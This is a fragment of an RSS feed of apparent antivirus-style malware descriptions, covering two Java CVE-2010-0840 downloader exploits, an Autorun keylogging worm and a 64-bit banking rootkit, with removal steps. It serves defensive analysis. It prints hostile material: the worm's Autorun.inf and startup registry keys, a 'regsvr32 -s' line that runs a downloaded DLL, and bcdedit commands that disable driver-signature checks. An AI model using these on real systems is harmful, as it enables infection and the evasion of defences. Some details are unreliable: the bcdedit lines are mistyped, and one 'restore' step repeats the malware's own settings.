			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The malicious program is an exploit, which uses vulnerability in Sun Java JRE and JDK to download files from the Internet and to execute them on the infected machine. It is a JAR-archive that contains a collection of Java-classes (class-files). Its size is 18,043 bytes.
&lt;/p&gt;&lt;p&gt;MD5: B128448CE2DEC747EC806A47800F7100
&lt;/p&gt;&lt;p&gt;SHA1: 82961301732E8AF889BDB1B7E50197C8B433BC5B
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The malicious JAR-archive contains the following files:
&lt;/p&gt;
&lt;pre&gt;
bingo\chugun.class (365 bytes)
bingo\dipler.class (1,394 bytes)
 
bingo\efir.class (17,766 bytes; it is detected by Kaspersky Antivirus as &amp;quot;Trojan-Downloader.Java.OpenConnection.er&amp;quot;)
 
bingo\haskalu.class (2,532 bytes)
bingo\kipoltyrew.class (856 bytes)
Meta-inf\Manifest.mf (71 bytes)
&lt;/pre&gt;
&lt;p&gt;The described collection of classes is an implementation of Java-applet (the main applet class is "efir"). The malicious applet uses the vulnerability &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840" class="external text"&gt;CVE-2010-0840&lt;/a&gt; for the purpuse of downloading files from the Internet to an infected computer. The vulnerability is is related to improper checks when executing privileged methods in the Java Runtime Environment, which allows attackers to execute arbitrary code via an untrusted object that extends the trusted class but has not modified a certain method.
&lt;/p&gt;&lt;p&gt;The malicious applet is launched from an infected HTML-page by using the "&amp;lt;APPLET&amp;gt;" tag. URL for downloading file is passed to malicious applet as the tag parameter "kdwidth" in encrypted form. Decoding is performed by using the function "fipoluty", implemented in the class "efir". During decoding, the following correspondence between input and output symbols is used: 
&lt;/p&gt;&lt;p&gt;Input symbols:
&lt;/p&gt;
&lt;pre&gt;xTc/8:G1RqgymtFz_S?nuJHkpP=DBaeOj2&amp;amp;7Q%Mh5bXdK0vf4E-YCisAwV9rI.3oZl6LN#UW
&lt;/pre&gt;
&lt;p&gt;Output symbols:
&lt;/p&gt;
&lt;pre&gt;0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&amp;amp;=%#
&lt;/pre&gt;
&lt;p&gt;Once launched, the exploit checks the name of the installed OS on the infected computer. If OS is different from Windows, the exploit will end its work.Otherwise, it downloads files from received URL. The downloaded file is stored as
&lt;/p&gt;
&lt;pre&gt;%USERPROFILE%\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;where - random fractional decimal numbers from 0 to 1.
&lt;/p&gt;&lt;p&gt;This file is launched after the successful download.
&lt;/p&gt;&lt;p&gt;Also, the exploit sets the value of "java.net.useSystemProxies" parameter to "true".
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Delete the original exploit's file (its location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;2. Delete the file:
&lt;/p&gt;
&lt;pre&gt;%USERPROFILE%\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;3. Update Sun Java JRE and JDK to the latest versions.
&lt;/p&gt;&lt;p&gt;4. Clear the Temporary Internet Files directory, which may contain infected files.
&lt;/p&gt;&lt;p&gt;5. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 31 Jul 2011 23:53:27 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan-Downloader.Java.OpenConnection.er</guid>
		</item>
		<item>
			<title>Worm.Win32.Autorun.hfp</title>
			<link>http://www.totalmalwareinfo.com/eng/Worm.Win32.Autorun.hfp</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;Worm that spreads own copies on the user’s hard drive and through removable drives. It is a Windows application (PE-EXE file). Its size is 303,104 bytes. It is written in C++.
&lt;/p&gt;&lt;p&gt;MD5: 7CB3DF16C623188729722859A36AAC76
&lt;/p&gt;&lt;p&gt;SHA1: 9F8BF601AC2DCBED20E8D4C3D87E185DB27CCDEF
&lt;/p&gt;
&lt;table id="toc" class="toc"&gt;&lt;tr&gt;&lt;td&gt;&lt;div id="toctitle"&gt;&lt;h2&gt;Contents&lt;/h2&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li class="toclevel-1 tocsection-1"&gt;&lt;a href="#Installation"&gt;&lt;span class="tocnumber"&gt;1&lt;/span&gt; &lt;span class="toctext"&gt;Installation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-2"&gt;&lt;a href="#Spread_Through_Removable_Devices"&gt;&lt;span class="tocnumber"&gt;2&lt;/span&gt; &lt;span class="toctext"&gt;Spread Through Removable Devices&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-3"&gt;&lt;a href="#Payload"&gt;&lt;span class="tocnumber"&gt;3&lt;/span&gt; &lt;span class="toctext"&gt;Payload&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-4"&gt;&lt;a href="#Removal_Instructions"&gt;&lt;span class="tocnumber"&gt;4&lt;/span&gt; &lt;span class="toctext"&gt;Removal Instructions&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;script&gt;if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); } &lt;/script&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the worm copies its body to the following files:
&lt;/p&gt;
&lt;pre&gt;
%Program  Files%\Windows Common Files\Commgr.exe
%Program  Files%\Windows Alerter\WinAlert.exe
&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe
&lt;/pre&gt;
&lt;p&gt;The attributes "hidden" and "system" are set to this files.
&lt;/p&gt;&lt;p&gt;To automatically start the copies every time you start the system the worm creates the system registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;WindowMessenger&amp;quot; = &amp;quot;&amp;lt;system drive&amp;gt;\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe&amp;quot;
&amp;quot;Windows Alerter&amp;quot; = &amp;quot;%Program  Files%\Windows Alerter\WinAlert.exe&amp;quot;
&amp;quot;Windows Common Files Manager&amp;quot; = &amp;quot;%Program  Files%\Windows Common Files\Commgr.exe

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;WindowMessenger&amp;quot; = &amp;quot;&amp;lt;system drive&amp;gt;\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe&amp;quot;
&amp;quot;Windows Alerter&amp;quot; = &amp;quot;%Program  Files%\Windows Alerter\WinAlert.exe&amp;quot;
&amp;quot;Windows Common Files Manager&amp;quot; = &amp;quot;%Program  Files%\Windows Common Files\Commgr.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;In addition, the worm disables the display of hidden and system files/directories, as well as display the extensions for registered file types in Windows Explorer. For this purpose it changes the values of the following registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
&amp;quot;Hidden&amp;quot; = &amp;quot;2&amp;quot;
&amp;quot;ShowSuperHidden&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;SuperHidden&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;HideFileExt&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Spread_Through_Removable_Devices"&gt;Spread Through Removable Devices&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The worm сopies its executable file to all writable removable drives connected to the victim's computer:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;the infected partition's name&amp;gt;:\RECYCLER\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd&amp;gt; - a random string of letters (for example: "UxVgOoS").
&lt;/p&gt;&lt;p&gt;Also the script "Autorun.inf" is created in the root directory of an infected disk:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;the infected partition's name&amp;gt;:\Autorun.inf
&lt;/pre&gt;
&lt;p&gt;This script contains the following strings:
&lt;/p&gt;
&lt;pre&gt;
[Autorun]
Open=RECYCLER\&amp;lt;rnd&amp;gt;.exe
Explore=RECYCLER\&amp;lt;rnd&amp;gt;.exe
AutoPlay=RECYCLER\&amp;lt;rnd&amp;gt;.exe
shell\Open\Command=RECYCLER\&amp;lt;rnd&amp;gt;.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\&amp;lt;rnd&amp;gt;.exe
shell\Autoplay\Command=RECYCLER\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;Also it creates the file on infected disk:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;the infected partition's name&amp;gt;:\RECYCLER\dEsKtOp.InI
&lt;/pre&gt;
&lt;p&gt;This file contains the following strings:
&lt;/p&gt;
&lt;pre&gt;
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
&lt;/pre&gt;
&lt;p&gt;In addition, the worm applies the "hidden" attribute to all directories in the root of an infected removable disk. After that the worm creates copies of its executable on this disk under hidden directories' names. 
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the worm performs the following actions:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; It extracts from its body the following files:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\bnf0342 (102266 bytes)
&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\wndsvc.dll (4 bytes)
&lt;/pre&gt;
&lt;p&gt;The attributes "hidden" and "system" are set to this files. 
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; It executes all created copies. The worm monitors a list of running processes in the system. If there is no running process of at least one copy of the malware, all its copies will be restarted.
&lt;/li&gt;&lt;li&gt; In a separate thread it terminates the process of the Windows Task Manager ("taskmgr.exe").
&lt;/li&gt;&lt;li&gt; In a separate thread it monitors a user keyboard input. The collected data is stored to file:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\info
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; In a separate thread every 2 seconds it performs the actions described in the Installation section.
&lt;/li&gt;&lt;li&gt; In an endless loop every 5 seconds it copies the contents of the file:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\bnf0342
&lt;/pre&gt;
&lt;p&gt;to the file:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\OnlyDbv.jpg
&lt;/pre&gt;
&lt;p&gt;After that, it opens the file "OnlyDbv.jpg", preventing its removal.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Restart the computer in "Safe Mode" (at the beginning of loading press and hold «F8», then select «Safe Mode» at the Windows boot menu).
&lt;/p&gt;&lt;p&gt;2. Delete the following files:
&lt;/p&gt;
&lt;pre&gt;
%Program  Files%\Windows Common Files\Commgr.exe
%Program  Files%\Windows Alerter\WinAlert.exe
&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe
&amp;lt;the infected partition's name&amp;gt;:\RECYCLER\&amp;lt;rnd&amp;gt;.exe
&amp;lt;the infected partition's name&amp;gt;:\Autorun.inf
&amp;lt;the infected partition's name&amp;gt;:\RECYCLER\dEsKtOp.InI
&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\bnf0342
&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\wndsvc.dll
&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\info
&amp;lt;system drive&amp;gt;:\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\OnlyDbv.jpg
&lt;/pre&gt;
&lt;p&gt;3. Delete the original worm's file (its location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;4. Delete copies created by the worm on infected removable drives.
&lt;/p&gt;&lt;p&gt;5. Delete the system registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;WindowMessenger&amp;quot; = &amp;quot;&amp;lt;system drive&amp;gt;\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe&amp;quot;
&amp;quot;Windows Alerter&amp;quot; = &amp;quot;%Program  Files%\Windows Alerter\WinAlert.exe&amp;quot;
&amp;quot;Windows Common Files Manager&amp;quot; = &amp;quot;%Program  Files%\Windows Common Files\Commgr.exe

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;WindowMessenger&amp;quot; = &amp;quot;&amp;lt;system drive&amp;gt;\RECYCLER\X-1-5-21-1960408961-725345543-839522115-1003\WinSysApp.exe&amp;quot;
&amp;quot;Windows Alerter&amp;quot; = &amp;quot;%Program  Files%\Windows Alerter\WinAlert.exe&amp;quot;
&amp;quot;Windows Common Files Manager&amp;quot; = &amp;quot;%Program  Files%\Windows Common Files\Commgr.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;6. Restore the original registry key values:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
&amp;quot;Hidden&amp;quot; = &amp;quot;2&amp;quot;
&amp;quot;ShowSuperHidden&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;SuperHidden&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;HideFileExt&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;p&gt;7. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 24 Jul 2011 21:06:47 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Worm.Win32.Autorun.hfp</guid>
		</item>
		<item>
			<title>Exploit.Java.CVE-2010-0840.ay</title>
			<link>http://www.totalmalwareinfo.com/eng/Exploit.Java.CVE-2010-0840.ay</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The malicious program is an exploit, which uses a vulnerability in JRE (Java Runtime Environment) to download other malicious programs from the Internet and execute them on the infected machine. It is a JAR-archive that contains a collection of Java-classes (class-files).Its size is 10,034 bytes.
&lt;/p&gt;&lt;p&gt;MD5: 383133B52FFF57FB7B736082751D36F5
&lt;/p&gt;&lt;p&gt;SHA1: 48A6F8FBD79740BDCFE637076FAAD21B26523442
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The malicious JAR-archive contains the following files:
&lt;/p&gt;
&lt;pre&gt;
MessageStack\QueryConstructor.class (490 bytes)
MessageStack\QueryFromMessage.class (599 bytes)
MessageStack\StringPack.class (1320 bytes)
MessageStack\TemplateMessage.class (2047 bytes)
MessageStack\TextMessage.class (571 bytes)
xmlTools\Container.class (3756 bytes)
xmlTools\Translator.class (552 bytes)
xmlTools\xml2html.class (5203 bytes)
xmlTools\XmlConstruct.class (2784 bytes)
&lt;/pre&gt;
&lt;p&gt;The malware is a Java-applet (the main applet class is "xml2html"), designed to downloading files from passed URLs, as well as launching downloaded files. It is launched from an infected HTML-page by using the "&amp;lt;APPLET&amp;gt;" tag. The list of URLs is passed to malicious applet as the tag parameter "prm" in encrypted form. Links in this list are separated by the symbols "::". Once launched, the exploit decrypts a received links by using the function "name" declared in the "StringPack" class . During decoding, the following correspondence between input and output symbols is used:
&lt;/p&gt;&lt;p&gt;Input symbols:
&lt;/p&gt;
&lt;pre&gt;QOn7cZAVmK/G4WuBqfLxj1_tlE8PTrpN2Y3:MUa=&amp;amp;5oRi%y?9DHv-Cgwkh60b.FdeSI#zJXs
&lt;/pre&gt;
&lt;p&gt;Output symbols:
&lt;/p&gt;
&lt;pre&gt;aDLXq-_.mjnWN6fwcsKB?xbITS=CykGvd91Z:%ElR5po0rzA8/JYP72#ue&amp;amp;t4iQFhVU3OMgH
&lt;/pre&gt;
&lt;p&gt;Then the exploit checks the name of operating system installed on the infected computer. If OS is different from Windows, the exploit will end its work. Otherwise, it downloads files from received URLs. The malware determines the type of the downloaded file (executable file or DLL). The downloaded files are stored under random names in the temporary folder of the current user "%Temp%":
&lt;/p&gt;
&lt;pre&gt;%Temp%\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;or
&lt;/p&gt;
&lt;pre&gt;%Temp%\&amp;lt;rnd&amp;gt;.dll
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd&amp;gt; - random fractional decimal numbers from 0 to 1.
&lt;/p&gt;&lt;p&gt;After successful downloading an executable file will be launched. In the case of loading a DLL, it will be launched by using the system utility "regsvr32.exe" 
&lt;/p&gt;
&lt;pre&gt;regsvr32 -s&amp;nbsp;%Temp%\&amp;lt;rnd&amp;gt;.dll
&lt;/pre&gt;
&lt;p&gt;During its work, the exploit uses the vulnerability &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840" class="external text"&gt;CVE-2010-0840&lt;/a&gt; in JRE (Java Runtime Environment). The vulnerability is related to improper checks when executing privileged methods in the Java Runtime Environment, which allows attackers to execute arbitrary code via an untrusted object that extends the trusted class but has not modified a certain method. This vulnerability allows malicious to inherit and use methods that are not available for a Java-applet class, which is a subclass of non-privileged "Applet" class.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;2. Delete the following files:
&lt;/p&gt;
&lt;pre&gt;
%Temp%\&amp;lt;rnd&amp;gt;.exe
%Temp%\&amp;lt;rnd&amp;gt;.dll
&lt;/pre&gt;
&lt;p&gt;3. Update Sun Java JRE and JDK to the latest versions.
&lt;/p&gt;&lt;p&gt;4. Clear the Temporary Internet Files directory, which may contain infected files.
&lt;/p&gt;&lt;p&gt;5. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 17 Jul 2011 19:59:03 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Exploit.Java.CVE-2010-0840.ay</guid>
		</item>
		<item>
			<title>Rootkit.Win64.Banker.a</title>
			<link>http://www.totalmalwareinfo.com/eng/Rootkit.Win64.Banker.a</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The malicious program is designed to remove components of security software Gbuster plugin for Internet Explorer. It is implemented as a kernel driver NT (kernel mode driver). It works under a 64-bit versions of Windows OS. Its size is 25,600 bytes.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The executable file of the malicious program is located in Windows drivers folder: 
&lt;/p&gt;
&lt;pre&gt;%Windir%\SysWOW64\drivers\plusdriver64.sys
&lt;/pre&gt;
&lt;p&gt;The service named "driverusbplus" provides the automatic startup of the rootkit driver every time you start the system. 
&lt;/p&gt;&lt;p&gt;Also the rootkit installer disables the verification of digital signatures for kernel-mode modules in the current startup configuration by executing the following command:
&lt;/p&gt;
&lt;pre&gt;bcdedit.exe-set loadoptions DDISABLE_INTEGRITY_CHECKS
&lt;/pre&gt;
&lt;p&gt;In addition, it enables the mode allowing booting drivers signed with a test certificates by performing the following command:
&lt;/p&gt;
&lt;pre&gt;bcdedit.exe-set TESTSIGNING ON
&lt;/pre&gt;
&lt;p&gt;Thus the rootkit evades the validation of kernel-mode drivers digital signatures.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the rootkit tries to delete the following files:
&lt;/p&gt;
&lt;pre&gt;
\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\gbiehAbn.dll
\Device\Harddisk0\Partition2\Program Files\GbPlugin\gbiehAbn.dll
\Device\Harddisk0\Partition2\Program Files (x86)\GbPlugin\gbiehAbn.dll

\Device\Harddisk0\Partition2\Arquivos de programas\GbPlugin\abn.gpc
\Device\Harddisk0\Partition2\Program Files (x86)\GbPlugin\abn.gpc
\Device\Harddisk0\Partition2\Program Files\GbPlugin\abn.gpc

